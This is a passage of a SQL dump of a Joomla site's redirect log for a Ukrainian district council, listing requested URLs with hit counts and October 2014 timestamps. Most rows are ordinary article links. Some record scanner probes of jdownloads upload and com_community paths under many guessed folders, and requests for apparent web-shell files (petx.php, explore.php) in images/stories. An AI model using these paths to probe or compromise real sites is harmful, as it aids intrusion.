00:00:00',301),(6620,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-l-r-2011-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',5,0,'2014-10-03 17:37:08','0000-00-00 00:00:00',301),(6621,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&Itemid=14&lang=uk','','','',1,0,'2014-10-03 17:37:37','0000-00-00 00:00:00',301),(6622,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&Itemid=14&lang=uk','','','',1,0,'2014-10-03 17:37:55','0000-00-00 00:00:00',301),(6623,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&Itemid=94&lang=ru','','','',1,0,'2014-10-03 17:37:59','0000-00-00 00:00:00',301),(6624,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1081:-2013-2017-&Itemid=70&lang=en','','','',1,0,'2014-10-03 17:38:07','0000-00-00 00:00:00',301),(6625,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1211:-2014-&Itemid=97&lang=uk','','','',1,0,'2014-10-03 17:38:15','0000-00-00 00:00:00',301),(6626,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&Itemid=14&lang=en','','','',1,0,'2014-10-03 17:38:17','0000-00-00 00:00:00',301),(6627,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-10-03 17:38:38','0000-00-00 00:00:00',301),(6628,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=897:2013-01-18-07-40-55&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2014-10-03 17:38:42','0000-00-00 00:00:00',301),(6629,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&Itemid=14&lang=uk','','','',1,0,'2014-10-03 17:39:13','0000-00-00 00:00:00',301),(6630,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&Itemid=14&lang=uk','','','',2,0,'2014-10-03 17:39:16','0000-00-00 00:00:00',301),(6631,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&lang=uk','','','',1,0,'2014-10-03 17:39:18','0000-00-00 00:00:00',301),(6632,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&Itemid=14&lang=ru','','','',2,0,'2014-10-03 17:39:20','0000-00-00 00:00:00',301),(6633,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1210:2014-02-03-13-20-51&Itemid=97&lang=en','','','',2,0,'2014-10-03 17:39:21','0000-00-00 00:00:00',301),(6634,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11&lang=uk','','','',6,0,'2014-10-03 17:39:22','0000-00-00 00:00:00',301),(6635,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&Itemid=14&lang=uk','','','',1,0,'2014-10-03 17:39:23','0000-00-00 00:00:00',301),(6636,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&Itemid=14&lang=uk','','','',1,0,'2014-10-03 17:39:23','0000-00-00 00:00:00',301),(6637,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&Itemid=14&lang=uk','','','',1,0,'2014-10-03 17:39:27','0000-00-00 00:00:00',301),(6638,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&Itemid=14&lang=ru','','','',1,0,'2014-10-03 17:39:29','0000-00-00 00:00:00',301),(6639,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11&Itemid=14&lang=ru','','','',18,0,'2014-10-03 17:39:37','0000-00-00 00:00:00',301),(6640,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&Itemid=14&lang=uk','','','',2,0,'2014-10-03 17:39:42','0000-00-00 00:00:00',301),(6641,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&Itemid=14&lang=uk','','','',1,0,'2014-10-03 17:39:44','0000-00-00 00:00:00',301),(6642,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&Itemid=14&lang=uk','','','',1,0,'2014-10-03 17:39:45','0000-00-00 00:00:00',301),(6643,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&Itemid=14&lang=ru','','','',1,0,'2014-10-03 17:39:46','0000-00-00 00:00:00',301),(6644,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&Itemid=14&lang=uk','','','',1,0,'2014-10-03 17:39:47','0000-00-00 00:00:00',301),(6645,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&Itemid=18&lang=en','','','',2,0,'2014-10-03 17:39:49','0000-00-00 00:00:00',301),(6646,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&Itemid=14&lang=uk','','','',1,0,'2014-10-03 17:39:52','0000-00-00 00:00:00',301),(6647,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&Itemid=14&lang=ru','','','',1,0,'2014-10-03 17:39:53','0000-00-00 00:00:00',301),(6648,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&Itemid=14&lang=ru','','','',1,0,'2014-10-03 17:39:53','0000-00-00 00:00:00',301),(6649,'http://malyn-rayrada.org.ua/ind/components/com_community/index.html','','','',39,0,'2014-10-03 17:50:43','0000-00-00 00:00:00',301),(6650,'http://malyn-rayrada.org.ua/ind/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',5,0,'2014-10-03 17:50:48','0000-00-00 00:00:00',301),(6651,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1099:------------------l-r&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-03 17:52:02','0000-00-00 00:00:00',301),(6652,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1210:2014-02-03-13-20-51&Itemid=97&lang=ru','','','',2,0,'2014-10-03 17:53:40','0000-00-00 00:00:00',301),(6653,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1210:2014-02-03-13-20-51&Itemid=97&lang=uk','','','',1,0,'2014-10-03 17:53:41','0000-00-00 00:00:00',301),(6654,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&Itemid=14&lang=uk','','','',1,0,'2014-10-03 17:53:42','0000-00-00 00:00:00',301),(6655,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&Itemid=14&lang=uk','','','',1,0,'2014-10-03 17:53:43','0000-00-00 00:00:00',301),(6656,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&Itemid=14&lang=uk','','','',1,0,'2014-10-03 17:53:44','0000-00-00 00:00:00',301),(6657,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2014-10-03 17:54:00','0000-00-00 00:00:00',301),(6658,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11&Itemid=14&lang=uk','','','',5,0,'2014-10-03 17:54:04','0000-00-00 00:00:00',301),(6659,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&Itemid=14&lang=uk','','','',1,0,'2014-10-03 17:54:28','0000-00-00 00:00:00',301),(6660,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11&Itemid=14&lang=uk','','','',28,0,'2014-10-03 17:54:32','0000-00-00 00:00:00',301),(6661,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&lang=uk','','','',1,0,'2014-10-03 17:54:35','0000-00-00 00:00:00',301),(6662,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&Itemid=14&lang=ru','','','',2,0,'2014-10-03 17:54:36','0000-00-00 00:00:00',301),(6663,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&Itemid=14&lang=uk','','','',1,0,'2014-10-03 17:54:38','0000-00-00 00:00:00',301),(6664,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-10-03 18:52:04','0000-00-00 00:00:00',301),(6665,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-03 18:53:31','0000-00-00 00:00:00',301),(6666,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11&lang=uk','','','',2,0,'2014-10-03 19:06:16','0000-00-00 00:00:00',301),(6667,'http://www.malyn-rayrada.org.ua/malk/components/com_community/index.html','','','',12,0,'2014-10-03 19:13:04','0000-00-00 00:00:00',301),(6668,'http://www.malyn-rayrada.org.ua/malk/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',2,0,'2014-10-03 19:13:07','0000-00-00 00:00:00',301),(6669,'http://www.malyn-rayrada.org.ua/home/components/com_community/index.html','','','',7,0,'2014-10-03 19:14:57','0000-00-00 00:00:00',301),(6670,'http://www.malyn-rayrada.org.ua/home/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',2,0,'2014-10-03 19:15:02','0000-00-00 00:00:00',301),(6671,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-03 19:32:48','0000-00-00 00:00:00',301),(6672,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11&lang=ru','','','',2,0,'2014-10-03 19:39:35','0000-00-00 00:00:00',301),(6673,'http://www.malyn-rayrada.org.ua/razakcup/components/com_community/index.html','','','',14,0,'2014-10-03 19:45:01','0000-00-00 00:00:00',301),(6674,'http://www.malyn-rayrada.org.ua/razakcup/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',2,0,'2014-10-03 19:45:06','0000-00-00 00:00:00',301),(6675,'http://www.malyn-rayrada.org.ua/majma/components/com_community/index.html','','','',5,0,'2014-10-03 19:45:44','0000-00-00 00:00:00',301),(6676,'http://www.malyn-rayrada.org.ua/majma/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-03 19:45:49','0000-00-00 00:00:00',301),(6677,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-03 19:55:15','0000-00-00 00:00:00',301),(6678,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-03 20:11:01','0000-00-00 00:00:00',301),(6679,'http://www.malyn-rayrada.org.ua/malva/components/com_community/index.html','','','',12,0,'2014-10-03 20:30:25','0000-00-00 00:00:00',301),(6680,'http://www.malyn-rayrada.org.ua/malva/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-03 20:30:29','0000-00-00 00:00:00',301),(6681,'http://malyn-rayrada.org.ua/images/stories/petx.php?baca','','','',15,0,'2014-10-03 21:41:08','0000-00-00 00:00:00',301),(6682,'http://malyn-rayrada.org.ua/images/stories/explore.php?baca','','','',15,0,'2014-10-03 21:41:14','0000-00-00 00:00:00',301),(6683,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11&Itemid=14&lang=uk','','','',2,0,'2014-10-03 22:10:36','0000-00-00 00:00:00',301),(6684,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1336:2014-06-10-11-01-06&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',8,0,'2014-10-04 01:06:53','0000-00-00 00:00:00',301),(6685,'http://www.malyn-rayrada.org.ua/11/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',2,0,'2014-10-04 01:54:57','0000-00-00 00:00:00',301),(6686,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=7&Itemid=12&lang=en','','','',6,0,'2014-10-04 03:44:44','0000-00-00 00:00:00',301),(6687,'http://www.malyn-rayrada.org.ua/Nouveau/components/com_community/index.html','','','',7,0,'2014-10-04 04:30:39','0000-00-00 00:00:00',301),(6688,'http://www.malyn-rayrada.org.ua/Nouveau/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',3,0,'2014-10-04 04:30:43','0000-00-00 00:00:00',301),(6689,'http://malyn-rayrada.org.ua/portal/components/com_community/index.html','','','',2,0,'2014-10-04 04:43:44','0000-00-00 00:00:00',301),(6690,'http://malyn-rayrada.org.ua/portal/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-04 04:43:49','0000-00-00 00:00:00',301),(6691,'http://www.malyn-rayrada.org.ua/forum/components/com_community/index.html','','','',11,0,'2014-10-04 04:54:36','0000-00-00 00:00:00',301),(6692,'http://www.malyn-rayrada.org.ua/forum/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',3,0,'2014-10-04 04:54:42','0000-00-00 00:00:00',301),(6693,'http://www.malyn-rayrada.org.ua/community/components/com_community/index.html','','','',23,0,'2014-10-04 05:16:30','0000-00-00 00:00:00',301),(6694,'http://www.malyn-rayrada.org.ua/community/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',3,0,'2014-10-04 05:16:33','0000-00-00 00:00:00',301),(6695,'http://www.malyn-rayrada.org.ua/joomla-mairie/components/com_community/index.html','','','',3,0,'2014-10-04 05:38:42','0000-00-00 00:00:00',301),(6696,'http://www.malyn-rayrada.org.ua/joomla-mairie/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-04 05:38:45','0000-00-00 00:00:00',301),(6697,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1278:2014-04-11-13-44-30&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-04 06:05:27','0000-00-00 00:00:00',301),(6698,'http://www.malyn-rayrada.org.ua/cms/components/com_community/index.html','','','',16,0,'2014-10-04 06:08:07','0000-00-00 00:00:00',301),(6699,'http://www.malyn-rayrada.org.ua/cms/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',7,0,'2014-10-04 06:08:12','0000-00-00 00:00:00',301),(6700,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1246:-2013-&catid=57:--15042014-&Itemid=98&lang=ru','','','',1,0,'2014-10-04 06:08:25','0000-00-00 00:00:00',301),(6701,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1268:-l-r&catid=57:--15042014-&Itemid=98&lang=ru','','','',5,0,'2014-10-04 06:08:29','0000-00-00 00:00:00',301),(6702,'http://malyn-rayrada.org.ua/sitio/components/com_community/index.html','','','',1,0,'2014-10-04 06:09:04','0000-00-00 00:00:00',301),(6703,'http://malyn-rayrada.org.ua/sitio/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-04 06:09:09','0000-00-00 00:00:00',301),(6704,'http://www.malyn-rayrada.org.ua/website/components/com_community/index.html','','','',5,0,'2014-10-04 06:18:16','0000-00-00 00:00:00',301),(6705,'http://www.malyn-rayrada.org.ua/website/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-04 06:18:22','0000-00-00 00:00:00',301),(6706,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1367:-lr-&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-10-04 06:38:55','0000-00-00 00:00:00',301),(6707,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1367:-lr-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-10-04 06:39:03','0000-00-00 00:00:00',301),(6708,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1367:-lr-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-10-04 06:39:07','0000-00-00 00:00:00',301),(6709,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1251:2014-03-24-07-11-22&catid=57:--15042014-&Itemid=98&lang=en','','','',4,0,'2014-10-04 07:13:40','0000-00-00 00:00:00',301),(6710,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1251:2014-03-24-07-11-22&catid=57:--15042014-&Itemid=98&lang=ru','','','',5,0,'2014-10-04 07:13:43','0000-00-00 00:00:00',301),(6711,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:-3110&catid=57:--15042014-&Itemid=98&lang=ru','','','',3,0,'2014-10-04 07:13:49','0000-00-00 00:00:00',301),(6712,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&catid=15&lang=en&Itemid=','','','',3,0,'2014-10-04 07:23:33','0000-00-00 00:00:00',301),(6713,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=887:-2013-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-04 08:10:34','0000-00-00 00:00:00',301),(6714,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1131:9-------&lang=en&option=com_content&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11%3A2010-06-05-14-33-33&id=1131%3A9-------&lang=en&option=com_content&view=article','',3,0,'2014-10-04 08:47:53','0000-00-00 00:00:00',301),(6715,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1103:2013-10-03-09-29-30&lang=uk&layout=default&page&print=1&tmpl=component&view=article','','http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1103:2013-10-03-09-29-30&lang=uk&layout=default&page&print=1&tmpl=component&','',3,0,'2014-10-04 09:09:19','0000-00-00 00:00:00',301),(6716,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-10-04 09:20:29','0000-00-00 00:00:00',301),(6717,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7----&catid=11&Itemid=14&lang=uk','','','',4,0,'2014-10-04 09:22:44','0000-00-00 00:00:00',301),(6718,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-10-04 09:36:14','0000-00-00 00:00:00',301),(6719,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&Itemid=14&lang=en','','','',2,0,'2014-10-04 09:37:18','0000-00-00 00:00:00',301),(6720,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-10-04 09:39:51','0000-00-00 00:00:00',301),(6721,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11&Itemid=14&lang=uk','','','',3,0,'2014-10-04 09:49:09','0000-00-00 00:00:00',301),(6722,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-04 09:50:40','0000-00-00 00:00:00',301),(6723,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-10-04 09:51:35','0000-00-00 00:00:00',301),(6724,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=945:2013-03-04-07-28-58&catid=36&Itemid=70&lang=en','','','',2,0,'2014-10-04 10:00:41','0000-00-00 00:00:00',301),(6725,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-04 10:04:20','0000-00-00 00:00:00',301),(6726,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&Itemid=14&lang=ru','','','',17,0,'2014-10-04 10:05:53','0000-00-00 00:00:00',301),(6727,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-04 10:10:22','0000-00-00 00:00:00',301),(6728,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=887:-2013-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-04 10:16:20','0000-00-00 00:00:00',301),(6729,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-10-04 10:19:46','0000-00-00 00:00:00',301),(6730,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1024:-l-2011-2014-r-&catid=51:--19072013-&Itemid=92&lang=en','','','',2,0,'2014-10-04 10:20:06','0000-00-00 00:00:00',301),(6731,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-10-04 10:21:37','0000-00-00 00:00:00',301),(6732,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7----&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-10-04 10:22:00','0000-00-00 00:00:00',301),(6733,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-10-04 10:39:13','0000-00-00 00:00:00',301),(6734,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1024:-l-2011-2014-r-&catid=51:--19072013-&Itemid=92&lang=en','','','',1,0,'2014-10-04 10:48:43','0000-00-00 00:00:00',301),(6735,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-04 10:49:58','0000-00-00 00:00:00',301),(6736,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-l-r-2011-2015-&catid=49&Itemid=88&lang=en','','','',1,0,'2014-10-04 11:37:58','0000-00-00 00:00:00',301),(6737,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-l-r-2011-2015-&catid=49:--12042013-&Itemid=88&lang=en','','','',2,0,'2014-10-04 11:41:21','0000-00-00 00:00:00',301),(6738,'http://www.malyn-rayrada.org.ua/index.php/20-2010-06-05-13-45-43/2010-06-06-09-34-01/956-15112013','','','',1,0,'2014-10-04 11:48:54','0000-00-00 00:00:00',301),(6739,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=887:-2013-&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-04 11:58:23','0000-00-00 00:00:00',301),(6740,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11&lang=uk&Itemid=','','','',4,0,'2014-10-04 12:25:58','0000-00-00 00:00:00',301),(6741,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1152:2013-11-28-14-58-05&catid=54&Itemid=95&lang=en','','','',2,0,'2014-10-04 12:26:15','0000-00-00 00:00:00',301),(6742,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&catid=58&Itemid=105&lang=uk','','','',3,0,'2014-10-04 12:26:18','0000-00-00 00:00:00',301),(6743,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-04 12:26:20','0000-00-00 00:00:00',301),(6744,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-10-04 12:26:22','0000-00-00 00:00:00',301),(6745,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=887:-2013-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-04 12:26:29','0000-00-00 00:00:00',301),(6746,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-10-04 12:41:34','0000-00-00 00:00:00',301),(6747,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-04 12:41:43','0000-00-00 00:00:00',301),(6748,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&catid=58:--30042014-&Itemid=105&lang=uk','','','',3,0,'2014-10-04 12:42:02','0000-00-00 00:00:00',301),(6749,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15&lang=en','','','',3,0,'2014-10-04 12:59:43','0000-00-00 00:00:00',301),(6750,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&catid=58:--30042014-&Itemid=105&lang=uk','','','',6,0,'2014-10-04 13:11:34','0000-00-00 00:00:00',301),(6751,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&lang=en','','','',3,0,'2014-10-04 13:24:48','0000-00-00 00:00:00',301),(6752,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-10-04 13:28:55','0000-00-00 00:00:00',301),(6753,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-10-04 13:36:17','0000-00-00 00:00:00',301),(6754,'http://www.malyn-rayrada.org.ua/index.php/20-2010-06-05-13-45-43/2010-06-06-09-34-01/977-2013-12-20-07-44-35','','','',1,0,'2014-10-04 13:38:19','0000-00-00 00:00:00',301),(6755,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1047:2013-07-10-05-51-36&catid=51:--19072013-&Itemid=92&lang=en','','','',2,0,'2014-10-04 14:03:21','0000-00-00 00:00:00',301),(6756,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-04 14:05:30','0000-00-00 00:00:00',301),(6757,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1268:-l-r&catid=57&Itemid=98&lang=en','','','',3,0,'2014-10-04 14:08:31','0000-00-00 00:00:00',301),(6758,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l------r&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-04 14:09:15','0000-00-00 00:00:00',301),(6759,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11&lang=ru','','','',2,0,'2014-10-04 14:15:20','0000-00-00 00:00:00',301),(6760,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-04 14:15:23','0000-00-00 00:00:00',301),(6761,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1281:2014-04-15-09-13-01&catid=57:--15042014-&Itemid=98&lang=en','','','',3,0,'2014-10-04 14:20:35','0000-00-00 00:00:00',301),(6762,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1281:2014-04-15-09-13-01&catid=57&Itemid=98&lang=en','','','',3,0,'2014-10-04 14:24:37','0000-00-00 00:00:00',301),(6763,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1268:-l-r&catid=57:--15042014-&Itemid=98&lang=en','','','',2,0,'2014-10-04 14:25:29','0000-00-00 00:00:00',301),(6764,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&lang=en&Itemid=','','','',5,0,'2014-10-04 14:30:31','0000-00-00 00:00:00',301),(6765,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=895:-2013-2017-&catid=47:-21022013-&Itemid=86&lang=ru','','','',1,0,'2014-10-04 14:40:41','0000-00-00 00:00:00',301),(6766,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&Itemid=14&lang=uk','','','',3,0,'2014-10-04 14:40:47','0000-00-00 